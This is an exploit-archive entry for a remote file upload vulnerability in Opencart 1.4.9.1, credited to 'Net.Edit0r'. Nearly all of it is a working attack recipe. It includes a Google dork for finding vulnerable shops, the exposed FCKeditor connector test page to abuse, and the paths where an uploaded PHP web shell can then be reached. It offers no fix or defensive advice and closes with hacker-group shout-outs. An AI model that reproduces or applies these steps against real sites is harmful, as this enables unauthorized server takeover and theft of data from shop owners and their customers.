Opencart 1.4.9.1 Remote File Upload Vulnerability

2010-09-20T00:00:00
ID 1337DAY-ID-14126
Type zdt
Reporter Net.Edit0r
Modified 2010-09-20T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =================================================
Opencart 1.4.9.1 Remote File Upload Vulnerability
=================================================

#Exploit Title: Opencart remote file uploade
#Author: Net.Edit0r
#Email: [email protected] ~ [email protected]
#Google dork: [inurl:Powered By OpenCart
#Software Link: http://www.opencart.com/index.php?route=download/download
#Platform :linux/php
 
######################################Iranian HackerZ####################################
 
# http://target.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
# Example site: http://server
# Select the "File Upload" To use = php
# http://server/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
# Sh3ll : http://server/admin/view/javascript/fckeditor/editor/filemanager/connectors/php/shell.php
# OR
# http://server/shell.php
 
######################################Demo Example####################################
 
#Demo : http://www.site.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html#
#Demo : http://www.site.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html#
 
#########################################################################################
 
#Spical Thanks To >> Darkcoder ~ Classic ~ Jenne bamaram ~ S3Ri0uS ~
_AriaNet_ And All B0x ((Web : ( http://houseofhackers.net/forum/ )))
 
########################################## End ##########################################



#  0day.today [2018-04-09]  #